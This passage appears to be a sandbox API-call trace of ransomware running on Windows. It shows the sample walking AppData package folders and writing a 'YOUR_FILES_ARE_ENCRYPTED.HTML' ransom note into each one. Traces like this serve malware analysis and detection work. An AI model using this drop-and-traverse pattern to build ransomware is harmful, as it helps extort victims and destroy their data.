ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0115.752] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0115.752] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0115.752] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.752] GetProcessHeap () returned 0x600000 [0115.752] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.753] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.754] CloseHandle (hObject=0x214) returned 1 [0115.754] GetProcessHeap () returned 0x600000 [0115.754] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.754] GetProcessHeap () returned 0x600000 [0115.754] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.754] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95756ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x95756ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x95756ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 0 [0115.754] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.754] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0115.754] GetProcessHeap () returned 0x600000 [0115.754] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.755] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.756] CloseHandle (hObject=0x32c) returned 1 [0115.756] GetProcessHeap () returned 0x600000 [0115.756] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.756] GetProcessHeap () returned 0x600000 [0115.756] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.757] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93857b8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x93857b8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x93857b8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0115.757] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.757] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData") returned 98 [0115.757] GetProcessHeap () returned 0x600000 [0115.757] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.758] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData" [0115.758] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData\\*" [0115.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93857b8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x93857b8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x93857b8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0115.759] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93857b8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x93857b8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x93857b8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0115.759] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93857b8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x93857b8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x93857b8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0115.759] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0115.759] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.759] GetProcessHeap () returned 0x600000 [0115.759] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.761] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.762] CloseHandle (hObject=0x32c) returned 1 [0115.762] GetProcessHeap () returned 0x600000 [0115.762] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.762] GetProcessHeap () returned 0x600000 [0115.762] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.763] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91bbc79, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x91bbc79, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x91bbc79, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0115.763] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.763] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache") returned 101 [0115.763] GetProcessHeap () returned 0x600000 [0115.763] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.764] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache" [0115.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache\\*" [0115.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91bbc79, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x91bbc79, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x91bbc79, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.764] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91bbc79, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x91bbc79, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x91bbc79, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0115.764] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91bbc79, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x91bbc79, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x91bbc79, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0115.764] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.765] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0115.765] GetProcessHeap () returned 0x600000 [0115.765] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.766] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.767] CloseHandle (hObject=0x32c) returned 1 [0115.767] GetProcessHeap () returned 0x600000 [0115.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.767] GetProcessHeap () returned 0x600000 [0115.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.767] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0115.767] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.767] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState") returned 101 [0115.767] GetProcessHeap () returned 0x600000 [0115.767] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.767] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState" [0115.767] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState\\*" [0115.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.767] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0115.767] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0115.767] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.768] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0115.768] GetProcessHeap () returned 0x600000 [0115.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.768] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.770] CloseHandle (hObject=0x32c) returned 1 [0115.770] GetProcessHeap () returned 0x600000 [0115.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.770] GetProcessHeap () returned 0x600000 [0115.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.770] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c03d9b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9c03d9b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9c03d9b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0115.771] StrStrIW (lpFirst="Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.771] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe") returned 148 [0115.771] GetProcessHeap () returned 0x600000 [0115.771] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.772] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe" [0115.772] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\*" [0115.772] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c03d9b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9c03d9b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9c03d9b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.772] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c03d9b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9c03d9b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9c03d9b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0115.773] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c03d9b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9d0eebc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9d0eebc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0115.773] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.773] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 164 [0115.773] GetProcessHeap () returned 0x600000 [0115.773] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.774] lstrcpyW (in: lpString1=0x30f2fc0, 